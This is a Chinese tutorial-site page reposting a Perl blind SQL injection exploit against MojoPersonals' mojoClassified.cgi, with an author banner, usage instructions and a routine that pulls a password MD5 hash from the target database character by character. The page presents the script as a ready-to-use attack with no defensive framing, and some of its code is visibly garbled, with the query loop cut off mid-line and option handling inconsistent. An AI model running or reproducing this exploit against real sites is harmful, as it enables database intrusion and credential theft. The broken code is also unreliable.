手机
当前位置:查字典教程网 >电脑 >电脑安全教程 >MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit
MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit
摘要:#!/usr/bin/perluseLWP::UserAgent;useGetopt::Long;if(!$ARGV[1]){print"n...

#!/usr/bin/perl

use LWP::UserAgent;

use Getopt::Long;

if(!$ARGV[1])

{

print " n";

print " #################### Viva IslaMe Viva IslaMe ################n";

print " # MojoPersonals Blind SQL Injection Exploit #n";

print " # (mojoClassified.cgi mojo ) #n";

print " # Author: Mr.SQL #n";

print " # EMAIL : SQL@HOTMAIL.IT #n";

print " # #n";

print " # -((:: GrE3E3E3E3E3ETZ ::))- #n";

print " # #n";

print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #n";

print " # :: ALwHeD :: milw0rm :: #n";

print " # #n";

print " # MuSliMs HaCkErS #n";

print " # #n";

print " # HOME: WwW.PaL- #n";

print " # #n";

print " # Usage : perl test.pl host #n";

print " # Example: perl test.pl / -d 10 #n";

print " # Options: #n";

print " # -d valid cat value #n";

print " #############################################################n";

exit;

}

my $host = $ARGV[0];

my $cat = $ARGV[2];

my %options = ();

GetOptions(%options, "u=i", "p=s", "d=i");

print "[~] Exploiting...n";

if($options{"b"})

{

$mojo = $options{"b"};

}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i get($query);

my $content = $resp->content;

my $regexp = "tourterms.pdf";

if($content =~ /$regexp/)

{

return 1;

}

else

{

return 0;

}

}

【MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit】相关文章:

制作一个百毒不侵的系统 无需安装杀毒软件

CoolPlayer m3u File Local Buffer Overflow Exploit

快速击破PaaS安全三大挑战的诀窍

如何利用Wireshark监测无线网络

如何识别驱动木马

File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities

webshell低权限重启服务器的另类方法

IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit

新浪微博安全手机注销了怎么办?

Win8安全模式开启方法

精品推荐
分类导航